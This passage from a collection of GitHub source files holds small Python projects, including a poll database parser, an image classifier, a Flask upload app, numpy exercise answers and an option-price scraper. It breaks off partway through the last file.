df.drop(['client','area','samplesize','snp','others','lead'],axis=1)\n return df\n\n#Takes a dataframe of polls and inserts them into the database\ndef pollsToDB(polls):\n conn = sqlite3.connect('sortedTweets.db')\n c = conn.cursor()\n for index, row in polls.iterrows():\n c.execute('INSERT INTO polls (pollster,date,con,lab,libdem,green) VALUES (?,?,?,?,?,?);',(row['pollster'],row['date'],row['con'],row['lab'],row['libdem'],row['green']))\n conn.commit()\n conn.close()\n\n#Takes brand new polls and inserts them into the database\ndef newPollsToDB():\n newPolls = newPollsToDF(0)\n conn = sqlite3.connect('sortedTweets.db')\n c = conn.cursor()\n earliest2021Id = 2137\n c.execute('SELECT pollster,date,con,lab,libdem,green FROM polls WHERE id > ?',(earliest2021Id,))\n existing = dbToDf(c.fetchall())\n complement = newPolls.merge(existing, how = 'outer' ,indicator=True).loc[lambda x : x['_merge']=='left_only']\n complement.drop(['_merge'],axis=1)\n print('Polls to be added to db:')\n print(complement)\n pollsToDB(complement.iloc[::-1])\n\n#Converts polls selected from a database to a dataframe\ndef dbToDf(polls):\n df = pd.DataFrame(polls,columns=['pollster','date','con','lab','libdem','green'])\n return df \n\n#Creates the poll table in sortedTweets.db\ndef makePollTable(file):\n conn = sqlite3.connect(file)\n c = conn.cursor()\n c.execute('''CREATE TABLE IF NOT EXISTS polls (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n pollster TEXT,\n date TEXT,\n con TEXT,\n lab TEXT,\n libdem TEXT,\n green TEXT,\n positiveTweets TEXT,\n negativeTweets TEXT,\n sentiment TEXT\n )\n ''')\n conn.commit()\n conn.close()\n\nif __name__ == '__main__':\n # pollsPre2020 = pre2020PollsToDF()\n # polls2020 = newPollsToDF(1)\n # polls2021 = newPollsToDF(0)\n # pre2021Polls = polls2020.append(pollsPre2020)\n # allPolls = polls2021.append(pre2021Polls)\n # makePollTable()\n # pollsToDB(allPolls.iloc[::-1])\n newPollsToDB()","repo_name":"swright3/cs310project","sub_path":"pollparser2.py","file_name":"pollparser2.py","file_ext":"py","file_size_in_byte":5450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16839473552","text":"from utils import load_data\n\nimport torch\nimport torchvision\nimport torch.utils.tensorboard as tb\nfrom torchvision import transforms\n\ndevice = torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\")\n\n\nclass CNNClassifier(torch.nn.Module):\n class Block(torch.nn.Module):\n def __init__(self, input_channels, output_channels, stride):\n super().__init__()\n self.net = torch.nn.Sequential(\n torch.nn.Conv2d(\n input_channels, output_channels, kernel_size=3, padding=1, stride=stride\n ),\n torch.nn.GroupNorm(8, output_channels),\n torch.nn.ReLU(),\n torch.nn.Conv2d(output_channels, output_channels, kernel_size=3, padding=1),\n torch.nn.GroupNorm(8, output_channels),\n torch.nn.ReLU(),\n )\n self.downsample = torch.nn.Sequential(\n torch.nn.Conv2d(input_channels, output_channels, 1, stride=stride),\n torch.nn.GroupNorm(8, output_channels),\n )\n\n def forward(self, x):\n # w/ residual (downsample to match output of network)\n return self.net(x) + self.downsample(x)\n\n def __init__(\n self,\n layer_sizes=[32, 64, 128],\n input_channels=3,\n num_classes=6,\n padding=3,\n stride=2,\n dropout_rate=0.1,\n input_transforms=torchvision.transforms.Compose(\n [\n torchvision.transforms.Normalize(\n mean=[0.1688, 0.1590, 0.1803], std=[0.3746, 0.3657, 0.3845]\n )\n ]\n ),\n ):\n super().__init__()\n\n self.HEIGHT_DIM = 2\n self.WIDTH_DIM = 3\n self.input_transforms = input_transforms\n\n output_channels = 32\n layers = [\n torch.nn.Conv2d(\n input_channels, output_channels, kernel_size=7, padding=padding, stride=stride\n ),\n torch.nn.ReLU(),\n torch.nn.MaxPool2d(kernel_size=3, stride=stride, padding=1),\n ]\n\n for channels in layer_sizes:\n layers.append(self.Block(output_channels, channels, stride=stride))\n output_channels = channels\n\n self.layers = torch.nn.Sequential(*layers)\n self.classifier = torch.nn.Linear(output_channels, num_classes)\n self.classifier.weight.zero_\n self.dropout = torch.nn.Dropout(p=dropout_rate)\n\n def forward(self, x):\n \"\"\"\n @x: Tensor((Batch,3,64,64))\n @return: Tensor((Batch,6))\n \"\"\"\n x = self.input_transforms(x)\n return self.classifier(\n self.dropout(self.layers(x).mean(dim=[self.HEIGHT_DIM, self.WIDTH_DIM]))\n )\n\n\ndef train(args):\n from os import path\n\n model = CNNClassifier()\n train_logger, valid_logger = None, None\n if args.log_dir is not None:\n train_logger = tb.SummaryWriter(path.join(args.log_dir, \"train\"), flush_secs=1)\n valid_logger = tb.SummaryWriter(path.join(args.log_dir, \"valid\"), flush_secs=1)\n\n model = model.to(device)\n\n loss_function = torch.nn.CrossEntropyLoss()\n optim = torch.optim.SGD(\n model.parameters(), lr=args.learning_rate, momentum=0.9, weight_decay=1e-4\n )\n lr_scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optim, \"max\", patience=10)\n epochs = args.epochs\n\n train_data_loader = load_data(\n \"data/train\",\n img_transform=transforms.Compose(\n [\n transforms.ColorJitter(brightness=0.8, contrast=0.2, saturation=0.2, hue=0.1),\n transforms.RandomHorizontalFlip(p=0.6),\n transforms.RandomVerticalFlip(p=0.6),\n transforms.RandomCrop(64),\n transforms.ToTensor(),\n ]\n ),\n )\n valid_data_loader = load_data(\"data/valid\")\n\n if args.input_norm:\n compute_input_norm(train_data_loader)\n\n global_step = 0\n best_accuracy = 0.93\n for _ in range(epochs):\n model.train()\n for _, (train_features, train_labels) in enumerate(train_data_loader):\n train_features, train_labels = (\n train_features.to(device),\n train_labels.to(device),\n )\n forward_output = model(train_features)\n loss = loss_function(forward_output, train_labels)\n train_logger.add_scalar(\"train/loss\", loss, global_step)\n global_step += 1\n\n optim.zero_grad()\n loss.backward()\n optim.step()\n\n train_logger.add_scalar(\n \"train/accuracy\", compute_accuracy(train_data_loader, model), global_step=global_step\n )\n validation_accuracy = compute_accuracy(valid_data_loader, model)\n valid_logger.add_scalar(\"valid/accuracy\", validation_accuracy, global_step=global_step)\n lr_scheduler.step(validation_accuracy)\n if validation_accuracy > best_accuracy:\n best_accuracy = validation_accuracy\n # save_model(model)\n\n # save_model(model)\n\n\ndef compute_accuracy(data_loader, model):\n model.eval()\n with torch.no_grad():\n train_accuracy = 0\n num_batches = 0\n for _, (train_features, train_labels) in enumerate(data_loader):\n train_features, train_labels = (\n train_features.to(device),\n train_labels.to(device),\n )\n num_batches += 1\n forward_output = model(train_features)\n train_accuracy += torch.sum(\n (\n train_labels == torch.argmax(torch.nn.Softmax(dim=1)(forward_output), dim=1)\n ).long()\n ) / len(train_labels)\n\n return train_accuracy / num_batches\n\n\ndef compute_input_norm(train_data_loader):\n x = torch.zeros(3)\n x_squared = torch.zeros(3)\n num_batches = 0.0\n for _, (train_features, _) in enumerate(train_data_loader):\n x += torch.mean(train_features, dim=[0, 2, 3])\n x_squared += torch.mean(torch.pow(train_features, 2), dim=[0, 2, 3])\n num_batches += 1.0\n mean = x / num_batches\n std_dev = torch.pow((x_squared / num_batches - torch.pow(mean, 2.0)), 0.5)\n print(mean)\n print(std_dev)\n\n\n# import argparse\n# parser = argparse.ArgumentParser()\n# parser.add_argument(\"-e\", \"--epochs\", default=1, type=int)\n# parser.add_argument(\"-lr\", \"--learning_rate\", default=0.01, type=float)\n# parser.add_argument(\"-inorm\", \"--input_norm\", default=False, type=bool)\n# parser.add_argument(\"-log\", \"--log_dir\", default=\"\")\n# args = parser.parse_args()\n# train(args)\n","repo_name":"matthibshman/deep-learning-projects","sub_path":"vision-applications/use-cases/image_classification.py","file_name":"image_classification.py","file_ext":"py","file_size_in_byte":6594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6851807607","text":"import os\nimport PyPDF2\nfrom flask import Flask, request, redirect, url_for\nfrom werkzeug.utils import secure_filename\n\nos.system(\"mkdir files\")\nUPLOAD_FOLDER = os.popen(\"pwd\").read().strip() + \"/files\"\nALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg'])\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\ndef read_data(filename):\n pdfFileObj = open('files/' + filename, 'rb')\n pdfReader = PyPDF2.PdfFileReader(pdfFileObj)\n number_of_pages = pdfReader.getNumPages()\n for page_number in range(number_of_pages): \n page = pdfReader.getPage(page_number).extractText().split(\" \") \n \n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n if 'file' not in request.files:\n flash('No file part')\n return redirect(request.url)\n file = request.files['file']\n if file.filename == '':\n flash('No selected file')\n return redirect(request.url)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n return redirect(url_for('uploaded_file',\n filename=filename))\n return '''\n <!doctype html>\n <title>Upload new File\n

Upload new File

\n
\n

\n \n

\n '''\n\nfrom flask import send_from_directory\n\n@app.route('/uploads/')\ndef uploaded_file(filename):\n read_data(filename)\n return send_from_directory(app.config['UPLOAD_FOLDER'],\n filename)\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"VibAltekar/akhillinit","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70854365559","text":"#!python3\n\n# write two functions that convert fahrenheit to celsius and back\n# Tc=(5/9)*(Tf-32)\n# Tf=(9/5)*Tc+32\n\n\ndef main():\n printer()\n amount()\n\n\ndef printer():\n print(\"#\" * 40)\n print(\"\\t\\t Temperature Converter\")\n print(\"#\" * 40)\n\n\ndef to_celsius(n):\n n = (5 / 9) * (n - 32)\n print(f\"Celsius: {n}\")\n\n\ndef to_fahrenheit(n):\n n = (9 / 5) * n + 32\n print(f\"Fahrenheit: {n}\")\n\n\ndef amount():\n temp = int(input(\"What temp?: \"))\n # temp = float(temp)\n print(\"Type 1. for Fahrenheit, and 2. for Celsius. Enter to Quit\")\n what = input(\" 1. or 2. >>\")\n\n if what == \"1\":\n to_fahrenheit(temp)\n elif what == \"2\":\n to_celsius(temp)\n else:\n print(\"Exiting..\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"danielmichaels/databank","sub_path":"scripts/temperature_converter.py","file_name":"temperature_converter.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"28070713135","text":"\n\n# while loop\n\n# Repeat body until condition is not true\n# else clause is run if the body of the loop is never executed,\ncount = 5\n\nwhile count:\n print(count, end=\", \")\n count -= 1\nelse:\n print(\"Can't count\")\n\n# find 3\ncount = 0\nwhile True:\n count += 1\n if count == 3:\n break\n\n\n\"\"\"\nfor target in object: # Assign object items to target\n statements\nif test: break # exit repetition\nif test: continue # skip this iteration\nelse: # execute if for loop body never executes\nstatements\n\"\"\"\n\n\n# else clause\nfor index in range(0):\n print(index)\nelse:\n print(\"None evaluated\")\n\n# print event numbers\nfor number in range(0, 5):\n if number % 2 != 0:\n continue\n print(number, end=\", \")\n\n# for index in range(5):\n# print(index)\n#\n# for index in range(2, 5, 2):\n# print(index)\n\n# list = [5, 4, 6, 7]\n\n# for index in range(len(list)):\n# print(list[index], end=\"\")\n\n# for element in list:\n# print(element, end=\"\")\n\n\n# grocery_list = {\"bacon\": 3.99, \"egg\": 2.99, \"bread\": 1.99}\n#\n# for item in grocery_list:\n# print(item, end=\", \")\n#\n# for item in grocery_list.keys():\n# print(item, end=\",\")\n#\n# for price in grocery_list.values():\n# print(price, end=\", \")\n#\n# for item, price in grocery_list.items():\n# print(item, \":\", price, end=\", \")\n\n","repo_name":"darrylweimers/python-3","sub_path":"tutorials/loop/loop.py","file_name":"loop.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17766711177","text":"# IMPORT PYTHON LIBRARIES\nimport sys\n\n\n# IMPORT MIR LIBRARIES\nsys.path.append('../lib')\nimport librosa\nimport pymir\nimport midiutil\n\n\n# IMPORT OUR MIR FUNCTIONS\nsys.path.append('functions')\nimport utils\nimport dictionaries\nimport beatDetection\nimport chordPrediction\nimport midiConversion\nimport midiFileCreation\n\n\nshow_diagnostics, settings, save = utils.set_defaults()\nprint(\t'\\nWelcome to Play With Yourself Music Accompaniment Tool.'\n\t\t'\\nType help for a list of valid commands')\n\nwhile(True):\n\tcmd = raw_input('\\nWhat would you like to do?\\n')\n\tcmd, show_diagnostics, settings, save = utils.process_command(cmd, show_diagnostics, settings, save);\n\tif (cmd == 'load_yes'):\n\t\tUI_instrument_notes = int(settings['inst1']);\t\t\tUI_onset_threshold = float((10-int(settings['busy']))/10.0);\n\t\tUI_instrument_chords = int(settings['inst2']);\t\t\tUI_dynamic_threshold = float(settings['dyn']/10.0);\n\t\tUI_instrument_beats = int(settings['inst3']);\t\t\tUI_beat_windowSize = float(settings['window']/10.0); #300 msec\n\t\tUI_beat_pattern = int(settings['pattern']);\t\t\t\tUI_chord_style = int(settings['style']);\n\t\tUI_time_signature = int(settings['timeSig']);\t\t\ty, sr = librosa.load(settings['filename'])\n\n\n\t\t# TRACK BEATS\n\t\tonsets, beats, volume_notes, times, tempo, msec_tempo = beatDetection.track_beats(y, sr, UI_onset_threshold, UI_dynamic_threshold, UI_beat_windowSize)\n\t\tbeatDetection.plot_beats_and_onsets(onsets, beats, times, show_diagnostics)\n\n\n\t\t# PREDICT CHORDS\n\t\tnotes, reg_notes, startTimes_notes, endTimes_notes, frameIndex_notes = chordPrediction.get_chords(settings['filename'], times[beats], times)\n\t\tchords, reg_chords, startTimes_chords, endTimes_chords, frameIndex_chords, volume_chords = midiConversion.determine_durations(list(notes), list(reg_notes), list(startTimes_notes), list(endTimes_notes), frameIndex_notes, list(volume_notes))\n\t\tchordPrediction.print_chords_and_times(chords, startTimes_chords, endTimes_chords, frameIndex_chords, times, show_diagnostics)\n\t\tstartTimes_beats, endTimes_beats, volume_beats = beatDetection.alter_beats(startTimes_notes, endTimes_notes, volume_notes, msec_tempo, UI_beat_windowSize, settings['speed'])\n\n\n\t\t# NOTES TO MIDI\n\t\tmidi_notes = midiConversion.convert_note_to_midi(notes, reg_notes)\n\t\tmidi_chords = midiConversion.convert_chord_to_midi(chords, reg_chords, UI_chord_style)\n\t\tmidi_beats = midiConversion.convert_beat_to_midi(notes, UI_beat_pattern, UI_time_signature, UI_instrument_beats, reg_notes, settings['speed'])\n\n\n\t\t# WRITE MIDI\n\t\tmidi_tracks = [midi_notes, midi_chords, midi_beats]\n\t\tstartTimes = [startTimes_notes, startTimes_chords, startTimes_beats]\n\t\tendTimes = [endTimes_notes, endTimes_chords, endTimes_beats]\n\t\tUI_instrument = [UI_instrument_notes, UI_instrument_chords, UI_instrument_beats]\n\t\tvolumes = [volume_notes, volume_chords, volume_beats]\n\t\tduration = [0]*len(midi_tracks); program = [0]*len(midi_tracks); volume = [0]*len(midi_tracks);\n\t\tfor i in range(len(midi_tracks)):\n\t\t\tduration[i], program[i], volume[i] = midiFileCreation.build_track(UI_instrument[i], midi_tracks[i], startTimes[i], endTimes[i], volumes[i], msec_tempo, UI_dynamic_threshold)\n\t\tmidiFileCreation.write_midi_file(settings['filename'], midi_tracks, program, duration, tempo[0], volume)\n\n\n\t\t# PREVIEW\n\t\tutils.preview(filename=settings['filename'],length=settings['preview'])\n\t\tutils.clean(filename=settings['filename'])\n","repo_name":"adarguy/playWithYourself","sub_path":"CLI/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3365,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"32682602466","text":"from django.urls import path\n#now import the views.py file into this code\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('cleaner//book/', views.book_cleaner, name='book_cleaner'),\n path('payment//', views.payment, name='payment'),\n path('booked//', views.booked, name='booked'),\n path('payment//', views.payment, name='payment'),\n path('webhook/stripe/', views.stripe_webhook, name='stripe_webhook'),\n path('profile/', views.profile, name='profile'),\n path('/signup', views.signup, name='signup'),\n path('/signin', views.signin, name='signin'),\n path('logout', views.logout, name='logout'),\n]\n","repo_name":"Shobayosamuel/SweepConnect","sub_path":"sweepconnect/app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24712718815","text":"import numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras.layers import Conv2D, Dropout\n\nfrom tensorflow.keras.layers import Input, concatenate, UpSampling2D\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras import layers\n#from models.FPN\n\nINPUT_DEPTH = 5\nINPUT_HEIGHT = 64\nINPUT_WIDTH = 1024\n\nclass Sem_Seg_Head(Model):\n def __init__(self):\n super(Sem_Seg_Head, self).__init__()\n self.dropout = Dropout(rate=0.01)\n self.conv = Conv2D(filters=20, kernel_size=3, strides=1, padding='same', data_format='channels_last')\n self.sem_softmax = Softmax(axis=3) \n\n def call(self, x):\n y = self.dropout(x)\n y = self.conv(y)\n y = self.softmax(y)\n return y\n\nif __name__ == '__main__':\n sem_seg_head = Sem_Seg_Head()\n sem_seg_head.build(input_shape=(None, 32, 64, 1024))\n sem_seg_head.call(Input(shape=(32, 64, 1024)))\n sem_seg_head.summary()\n","repo_name":"swagholikar29/Panoptic-Segmentation","sub_path":"scripts/models/Semantic_Segmentation_Head.py","file_name":"Semantic_Segmentation_Head.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"71146572282","text":"#a = np.array([4, 10, 12, 23, -2, -1, 0, 0, 0, -6, 3, -7])\n# 1. How many negative numbers are there?\nimport numpy as np\na = np.array([4, 10, 12, 23, -2, -1, 0, 0, 0, -6, 3, -7])\nis_a_negative = a[a < 0]\nprint (len(is_a_negative))\n\n# 2. How many positive numbers are there?\nis_a_positive = a[a > 0]\nprint(len(is_a_positive))\n\n# 3. How many even positive numbers are there?\nis_a_positive_and_even = is_a_positive[is_a_positive % 2 == 0]\nprint(len(is_a_positive_and_even))\n\n# 4. If you were to add 3 to each data point, how many positive numbers would there be?\na_plus_three = a + 3\na_plus_three_is_positive = a_plus_three[a_plus_three > 0]\nprint(len(a_plus_three_is_positive))\n\n# 5. If you squared each number, what would the new mean and standard deviation be?\na_squared = a ** 2\nprint(a_squared.mean())\nprint(a_squared.std())\n\n# 6. A common statistical operation on a dataset is centering. \n# This means to adjust the data such that the center of the data is at 0. \n# This is done by subtracting the mean from each data point. Center the data set.\na_centered = a - a.mean()\nprint(a_centered)\n\n# 7. Calculate the z-score for each data point. \na_zscore = a_centered / a.std()\nprint(a_zscore)\n\n\n\n\n\n\n\n\n## Setup 1\na = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\n# Use python's built in functionality/operators to determine the following:\n# Exercise 1 - Make a variable called sum_of_a to hold the sum of all the numbers in above list\nsum_of_a = sum(a)\n\n# Exercise 2 - Make a variable named min_of_a to hold the minimum of all the numbers in the above list\nmin_of_a = min(a)\n\n# Exercise 3 - Make a variable named max_of_a to hold the max number of all the numbers in the above list\nmax_of_a = max(a)\n\n# Exercise 4 - Make a variable named mean_of_a to hold the average of all the numbers in the above list\nmean_of_a = sum(a)/len(a)\n\n# Exercise 5 - Make a variable named product_of_a to hold the product of multiplying all the numbers in the above list together\nproduct_of_a = a[0]\nfor n in a:\n product_of_a = product_of_a * n\nprint(product_of_a)\n\n# Exercise 6 - Make a variable named squares_of_a. It should hold each number in a squared like [1, 4, 9, 16, 25...]\nsquares_of_a = []\nfor n in a:\n squares_of_a.append(n**2)\nprint(squares_of_a)\n\n# Exercise 7 - Make a variable named odds_in_a. It should hold only the odd numbers\nodds_in_a = []\nfor n in a:\n if n % 2 != 0:\n odds_in_a.append(n)\nprint(odds_in_a)\n\n# Exercise 8 - Make a variable named evens_in_a. It should hold only the evens.\nevens_in_a = []\nfor n in a:\n if n % 2 == 0:\n evens_in_a.append(n)\nprint(evens_in_a)\n\n\n\n\n\n\n\n\n## What about life in two dimensions? A list of lists is matrix, a table, a spreadsheet, a chessboard...\n## Setup 2: Consider what it would take to find the sum, min, max, average, sum, product, and list of squares for this list of two lists.\nb = [\n [3, 4, 5],\n [6, 7, 8]\n]\nb= np.array(b)\n\n# Exercise 1 - refactor the following to use numpy. Use sum_of_b as the variable. **Hint, you'll first need to make sure that the \"b\" variable is a numpy array**\nsum_of_b = 0\nfor row in b:\n sum_of_b += sum(row)\n\nsum_of_b = np.sum(b)\n\nprint(sum_of_b)\n\n# Exercise 2 - refactor the following to use numpy. \nmin_of_b = min(b[0]) if min(b[0]) <= min(b[1]) else min(b[1]) \n\nmin_of_b = np.min(b) \n\nprint(min_of_b)\n\n# Exercise 3 - refactor the following maximum calculation to find the answer with numpy.\nmax_of_b = max(b[0]) if max(b[0]) >= max(b[1]) else max(b[1])\n\nmax_of_b = np.max(b)\n\nprint(max_of_b)\n\n# Exercise 4 - refactor the following using numpy to find the mean of b\nmean_of_b = (sum(b[0]) + sum(b[1])) / (len(b[0]) + len(b[1]))\n\nmean_of_b = np.mean(b)\n\nprint(mean_of_b)\n\n# Exercise 5 - refactor the following to use numpy for calculating the product of all numbers multiplied together.\nproduct_of_b = 1\nfor row in b:\n for number in row:\n product_of_b *= number\n\nproduct_of_b = np.prod(b)\n\nprint(product_of_b)\n\n# Exercise 6 - refactor the following to use numpy to find the list of squares \nsquares_of_b = []\nfor row in b:\n for number in row:\n squares_of_b.append(number**2)\n\nsquares_of_b = b ** 2\n\nprint(squares_of_b)\n\n\n# Exercise 7 - refactor using numpy to determine the odds_in_b\nodds_in_b = []\nfor row in b:\n for number in row:\n if(number % 2 != 0):\n odds_in_b.append(number)\n\nodds_in_b = b[b % 2 != 0]\n\nprint(odds_in_b)\n\n\n# Exercise 8 - refactor the following to use numpy to filter only the even numbers\nevens_in_b = []\nfor row in b:\n for number in row:\n if(number % 2 == 0):\n evens_in_b.append(number)\n\nevens_in_b = b[b % 2 == 0]\n\nprint(evens_in_b)\n\n# Exercise 9 - print out the shape of the array b.\nprint(b.shape)\n\n# Exercise 10 - transpose the array b.\nprint(np.transpose(b))\n\n# Exercise 11 - reshape the array b to be a single list of 6 numbers. (1 x 6)\nprint(np.reshape(b, (1,6)))\n\n# Exercise 12 - reshape the array b to be a list of 6 lists, each containing only 1 number (6 x 1)\nprint(np.reshape(b, (6,1)))\n\n\n\n\n\n\n\n\n\n## Setup 3\nc = [\n [1, 2, 3],\n [4, 5, 6],\n [7, 8, 9]\n]\nc = np.array(c)\n\n# HINT, you'll first need to make sure that the \"c\" variable is a numpy array prior to using numpy array methods.\n# Exercise 1 - Find the min, max, sum, and product of c.\nprint(c.min())\nprint(c.max())\nprint(c.sum())\nprint(np.prod(c))\n\n# Exercise 2 - Determine the standard deviation of c.\nprint(c.std())\n\n# Exercise 3 - Determine the variance of c.\nprint(c.var())\n\n# Exercise 4 - Print out the shape of the array c\nprint(np.shape(c))\n\n# Exercise 5 - Transpose c and print out transposed result.\ntranspose_c = c.transpose()\nprint(transpose_c)\n\n# Exercise 6 - Multiply c by the c-Transposed and print the result.\nc_product = c * transpose_c\nprint(c_product)\n\n# Exercise 7 - Write the code necessary to sum up the result of c times c transposed. Answer should be 261\nsum_c = sum(c * transpose_c)\nprint(sum(sum_c))\n\n# Exercise 8 - Write the code necessary to determine the product of c times c transposed. Answer should be 131681894400.\nprint(np.prod(c_product))\n\n\n\n\n\n\n\n\n## Setup 4\nd = [\n [90, 30, 45, 0, 120, 180],\n [45, -90, -30, 270, 90, 0],\n [60, 45, -45, 90, -45, 180]\n]\nd = np.array(d)\n\n# Exercise 1 - Find the sine of all the numbers in d\nprint(np.sin(d))\n\n# Exercise 2 - Find the cosine of all the numbers in d\nprint(np.cos(d))\n\n# Exercise 3 - Find the tangent of all the numbers in d\nprint(np.tan(d))\n\n# Exercise 4 - Find all the negative numbers in d\nd_negatives = d[d < 0]\nprint(d_negatives)\n\n# Exercise 5 - Find all the positive numbers in d\nd_positives = d[ d> 0]\nprint(d_positives)\n\n# Exercise 6 - Return an array of only the unique numbers in d.\nprint(np.unique(d))\n\n# Exercise 7 - Determine how many unique numbers there are in d.\nprint(len(np.unique(d)))\n\n# Exercise 8 - Print out the shape of d.\nprint(np.shape(d))\n\n# Exercise 9 - Transpose and then print out the shape of d.\nprint(np.transpose(d).shape)\n\n# Exercise 10 - Reshape d into an array of 9 x 2\nprint(np.reshape(d,(9,2)))\n\n\n\n\n","repo_name":"davidtenorio1/python-exercises","sub_path":"4.7_numpy_exercises.py","file_name":"4.7_numpy_exercises.py","file_ext":"py","file_size_in_byte":6974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9884031950","text":"par1 = eval(input(\"Enter the height of the triangle:\\n\") )\r\npar2 = '*'\r\n\r\ngap=(par1+par1-1)//2\r\nfor i in range(0,par1+par1-1,2):\r\n print(' '*gap, end='')\r\n print(par2*(i+1))\r\n gap=gap-1\r\n \r\n#Author: Lenard Carroll\r\n#Student Number: CRRLEN001","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_3/crrlen001/question2.py","file_name":"question2.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29317904667","text":"import glob\r\nimport time\r\n\r\nimport sys\r\nimport cv2\r\nimport os\r\n\r\nstderr = sys.stderr\r\nsys.stderr = open(os.devnull, 'w')\r\nimport tensorflow.keras as keras\r\nsys.stderr = stderr\r\n\r\nimport tensorflow as tf\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # Fuck you tensorflow\r\ntf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)\r\n\r\nimport numpy as np\r\n\r\n\r\ndef predict(image, height=224, width=224):\r\n # im = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n im = image\r\n\r\n im = im / 255\r\n im = cv2.resize(im, (height, width))\r\n im = im.reshape((1,) + im.shape)\r\n \r\n pred = model.predict(im)\r\n \r\n mask = pred.reshape((224, 224))\r\n\r\n return mask\r\n\r\ndef blackout(image, mask):\r\n mask[mask > 0.5] = 255\r\n mask[mask <= 0.5] = 0\r\n\r\n mask = cv2.resize(mask, (image.shape[1], image.shape[0]))\r\n mask_n = np.zeros_like(image)\r\n mask_n[:, :, 0] = mask\r\n mask_n[:, :, 1] = mask\r\n mask_n[:, :, 2] = mask\r\n\r\n # print(mask_n.shape)\r\n # print(img.shape)\r\n\r\n alpha = 0.8\r\n beta = (1.0 - alpha)\r\n dst = cv2.bitwise_and(image, mask_n)\r\n\r\n return dst\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n # model = keras.models.load_model('models/hairnet_matting.hdf5')\r\n fileName = sys.argv[1]\r\n\r\n model = keras.models.load_model('./segModel/checkpoint.hdf5')\r\n\r\n img = cv2.imread(fileName)\r\n\r\n mask = predict(img)\r\n\r\n d1 = time.time()\r\n dst = blackout(img, mask)\r\n\r\n cv2.imwrite(sys.argv[2], dst)\r\n","repo_name":"ChesterJFGould/FaceHairNet","sub_path":"modelGen/mask.py","file_name":"mask.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"43480762801","text":"\"\"\"\nAuthor: shifulin\nEmail: shifulin666@qq.com\n\"\"\"\n# python3\n\nfrom time import sleep\nfrom threading import Thread, Lock\n\nfrom requests import get, exceptions\nfrom numpy import polyfit, polyval, meshgrid, array, nan\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nfrom mpl_toolkits.mplot3d import Axes3D\n\nimport sina_etf_option_api\n\n\nhttp_header = {\n 'User-Agent': \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/97.0.4692.71 Safari/537.36\",\n 'Referer': \"https://stock.finance.sina.com.cn/\",\n}\n\nCOLORS = ['blue', 'yellow', 'lime', 'red', 'purple', 'slategray', 'tomato', 'orange', 'darkred', 'aqua']\nglobal_ax_lines_call = [{'ax': None, 'lines': []} for _ in range(5)]\nglobal_ax_lines_put = [{'ax': None, 'lines': []} for _ in range(5)]\nupdate_picture_lock = Lock()\nELEV = 30\nAZIM = 120\n\n\ndef requests_get(all_codes):\n url = \"http://hq.sinajs.cn/list={codes}\".format(codes=all_codes)\n while True:\n try:\n data = get(url, headers=http_header).content.decode('gbk').strip().split('\\n')\n break\n except (exceptions.ConnectionError, exceptions.ConnectTimeout) as e:\n print('连接出错,10秒后重试')\n print(e)\n sleep(10)\n return [i.split(',') for i in data]\n\n\ndef get_codes(cate, exchange, underlying, dividend):\n while True:\n try:\n dates = sorted(sina_etf_option_api.get_option_dates(cate=cate, exchange=exchange))\n call, put = [], []\n for date in dates:\n call_codes, put_codes = sina_etf_option_api.get_option_codes(date, underlying=underlying)\n call.append(['CON_SO_' + i for i in call_codes])\n put.append(['CON_SO_' + i for i in put_codes])\n all_codes = ','.join([','.join(i) for i in call] + [','.join(i) for i in put])\n data = requests_get(all_codes)\n if dividend:\n codes_tmp = [i[0][11:26] for i in data] # 考虑分红\n else:\n codes_tmp = 